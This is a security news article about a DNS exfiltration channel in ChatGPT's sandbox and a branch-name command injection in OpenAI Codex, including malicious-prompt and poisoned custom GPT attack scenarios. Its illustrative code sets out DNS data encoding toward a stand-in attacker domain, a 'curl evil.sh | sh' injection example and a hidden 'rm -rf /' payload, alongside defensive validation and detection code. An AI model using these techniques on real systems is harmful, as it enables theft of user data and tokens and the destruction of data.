Security analysts at Check Point have identified a significant vulnerability in ChatGPT that allowed unauthorized access to user conversations without the users' knowledge or consent. OpenAI resolved the issue by the end of February 2026, and there have been no reports of it being exploited in real-world attacks.

The flaw was traced to the Linux runtime environment the AI agent uses for data analysis and code execution. Researchers found a covert communication channel over DNS: sensitive information was encoded directly into DNS queries, bypassing existing security controls. Alarmingly, the channel could in theory also provide remote access to the Linux shell, enabling arbitrary command execution.

The model operated on the assumption that its execution environment was isolated and incapable of transmitting data externally, so the leak went unnoticed, triggered no alerts, and required no user confirmation.

One attack scenario: a malicious actor convinces a victim to paste a harmful prompt into the chat, disguised as a way to "unlock premium features" or "enhance ChatGPT's performance." Even more concerning, custom GPTs could be preloaded with malicious logic, eliminating the need for user interaction altogether.

Eli Smadja, head of Check Point Research, emphasized that the study highlights a troubling reality of the AI era: AI tools should not be assumed to be inherently secure.

Separately, experts from BeyondTrust Phantom Labs disclosed a critical command-injection vulnerability in OpenAI Codex, the cloud-based AI development agent. The flaw could lead to the theft of GitHub authentication tokens, compromising every user of a shared repository.
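To illustrate how a DNS covert channel of this kind works, here is a minimal sketch of the general technique: data is hex-encoded and split into DNS labels under an attacker-controlled zone, so each "lookup" delivers a chunk to the attacker's nameserver. The domain and chunking scheme below are hypothetical and purely illustrative, not the actual payload Check Point described; no network traffic is generated.

```python
# Illustrative sketch of DNS-based data encoding. The attacker domain is
# hypothetical; real exfiltration would resolve these names, letting the
# attacker's authoritative nameserver log the embedded data.
ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled zone
MAX_LABEL = 63  # a single DNS label may be at most 63 bytes (RFC 1035)

def encode_as_dns_queries(secret: str) -> list[str]:
    """Hex-encode data and split it into DNS labels under the attacker's zone."""
    hex_data = secret.encode("utf-8").hex()
    chunks = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    # A sequence number per label lets the receiver reassemble the data
    # even if queries arrive out of order.
    return [f"{i}.{chunk}.{ATTACKER_DOMAIN}" for i, chunk in enumerate(chunks)]

queries = encode_as_dns_queries("session_token=abc123")
```

Because the queries look like ordinary lookups, they pass through resolvers that an "isolated" sandbox is still allowed to reach, which is exactly why the channel escaped notice.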
The issue stemmed from insufficient input validation: Codex failed to properly check GitHub branch names during task execution, allowing attackers to inject commands directly through API POST requests. Malicious payloads could then execute inside the agent's container, giving attackers access to authentication tokens. BeyondTrust warned that the vulnerability enabled lateral movement and full read and write access to the victim's codebase.

To demonstrate how stealthy such an attack could be, the researchers crafted obfuscated payloads using Unicode characters, rendering the harmful commands invisible in the interface. The vulnerability affected the ChatGPT site, the Codex CLI, the Codex SDK, and the Codex extension for IDEs.

BeyondTrust reported the issue to OpenAI on December 16, 2025, and the company patched it by February 5, 2026. The incident underscores the need for ongoing vigilance in AI security, and other AI vendors will likely scrutinize their own systems for similar weaknesses.
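Codex's internals are not public, but the class of bug is familiar: an attacker-supplied branch name interpolated into a shell command becomes a command of its own. The sketch below shows the generic vulnerable pattern and one defensive fix (a conservative allow-list plus argv-style invocation); the function names and regex are this sketch's own assumptions, not OpenAI's code.

```python
import re

def checkout_command_unsafe(branch: str) -> str:
    # VULNERABLE pattern: the branch name is interpolated into a shell
    # string, so "main; curl evil.sh | sh" becomes two commands when the
    # string is handed to a shell.
    return f"git checkout {branch}"

# Git's own ref-name rules are more permissive, but a conservative
# allow-list blocks every shell metacharacter outright.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")

def checkout_command_safe(branch: str) -> list[str]:
    """Validate the branch name, then return argv for subprocess.run (no shell)."""
    if not SAFE_BRANCH.fullmatch(branch) or branch.startswith("-"):
        raise ValueError(f"rejected branch name: {branch!r}")
    # Passing argv as a list avoids shell parsing entirely.
    return ["git", "checkout", branch]
```

Rejecting names that start with "-" also prevents the branch from being parsed as a git option, a related injection vector.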
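The Unicode obfuscation relies on characters that most interfaces render as nothing at all, such as zero-width spaces and bidirectional controls. A simple defensive check, sketched below under the assumption that flagging Unicode "format" characters (category Cf) is sufficient for this purpose, makes such payloads visible before they reach a shell.

```python
import unicodedata

def find_invisible_chars(text: str) -> list[tuple[int, str]]:
    """Return (index, character name) for each format-category (Cf) character.

    Cf covers zero-width characters and bidi controls, which render
    invisibly in most UIs and are commonly used to hide payloads.
    """
    return [
        (i, unicodedata.name(ch, f"U+{ord(ch):04X}"))
        for i, ch in enumerate(text)
        if unicodedata.category(ch) == "Cf"
    ]

# Hypothetical payload: a zero-width space and a right-to-left override
# hidden inside what looks like an ordinary git command.
payload = "git checkout main\u200b\u202e;rm -rf /"
hits = find_invisible_chars(payload)
```

A review tool that highlights or rejects these characters would have made the researchers' "invisible" commands plainly visible.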